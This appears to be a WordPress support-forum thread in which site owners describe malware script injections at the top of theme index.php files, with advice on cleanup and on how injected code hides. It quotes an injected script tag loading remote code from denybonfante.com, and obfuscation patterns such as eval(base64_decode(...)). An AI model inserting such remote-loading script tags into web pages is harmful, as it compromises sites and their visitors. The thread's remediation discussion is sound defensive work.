Malware links script from www.argoauto.net

Got that same script, same malware warning from Google. I deleted that script, which was at the very top of index.php in the main theme file. My host, bluehost.com, is not being very helpful: sent a standard “how to deal with a hack” support email. And yes, I’ll go do all that, but wow, what a pain. I have pretty good backups to restore, but somehow I think the vulnerability will still be there.

Basics: Running WordPress 3.4.2 with Weaver II Pro
Hosted by Bluehost
Lots of plugins, notably Contact Form 7 and Google Calendar Events

funkytime said: “make sure you change your password, someone or a script cracked your password.”

and that seems sound, and yet I have to ask (naive security question) “how”? I was using a nine-character password with upper- and lower-case letters, at least one number, and at least one special symbol. I didn’t write it down anywhere. It should have taken thousands and thousands of attempts to crack it — shouldn’t that have alerted somebody to a security problem?

Or, to put it another way: Does alien injected code in index.php mean somebody surely has my password? Or is it more likely that some other vulnerability did it, like excessive permissions for a plugin?

I am curious about this, not trying to be cute or snippy. When I foul up my own passwords, I usually get locked out after a handful of unsuccessful logins — how is some hacker getting thousands and thousands of attempts?

Does alien injected code in index.php mean somebody surely has my password?

No, there are many ways you can get hacked, although if you are running Windows and get a virus then it is possible for that virus to steal your password, regardless of how strong it was. If you log in or use ftp over an unsecured wireless network (Starbucks or Panera, for example) it can get stolen that way as well.

If you’re hosting on Bluehost then odds are it is not an insecurity with the server (their servers are underpowered imo, but safe). If it wasn’t a virus or other password theft then most likely it would have been a script exploit, which means just fixing the visible hack won’t be enough. You should do a complete rebuild of the main site (fresh core WordPress, all fresh plugins) and carefully check the theme and uploads. Also, if you are hosting more than 1 domain on that account you will need to go through the others as well to make sure nothing else was affected.

@ken.crosby.evb –

This shows up in my Malware search in Developer tools and a few other sites. I am unable to find ‘argoauto.net’ in any searches of my files or my database. Where could this be hiding.

Sometimes code like this will be encrypted, where you won’t see it in directly in either the php or the database, and it only shows once WordPress has processed the php. The most common ways are either through using long random looking base64 encoded strings (typically implemented as eval(base64_decode(“… snippets), or via a line that starts like this: preg_replace(“/.*/e”,”\x65\x76\x61.

Thanks, that’s helpful. So I guess when a password gets compromised, it’s not usually a brute-force attack.

I haven’t seen much more about this particular exploit, so I guess it’s not as widespread as that timthumb.php business. Basic measures seem to have the malicious code gone from my site, and when I get some time away from my day job I’ll do more. (Volunteer webmaster, little community site . . . you get the picture.)

i just found this script inserted in our website. it created a text widget under one of our sidebars. no one seem to have a solution for this at the moment.

The latest line is <script type="text/javascript" src="https://denybonfante.com/app/Menu.php"></script>. Still no clue where it comes from. About once a month they appear at the top of my theme’s index.

I have remove the line <script type=”text/javascript” src=”https://denybonfante.com/app/Menu.php”></script&gt;

but the web still got Malware detected

need help here ??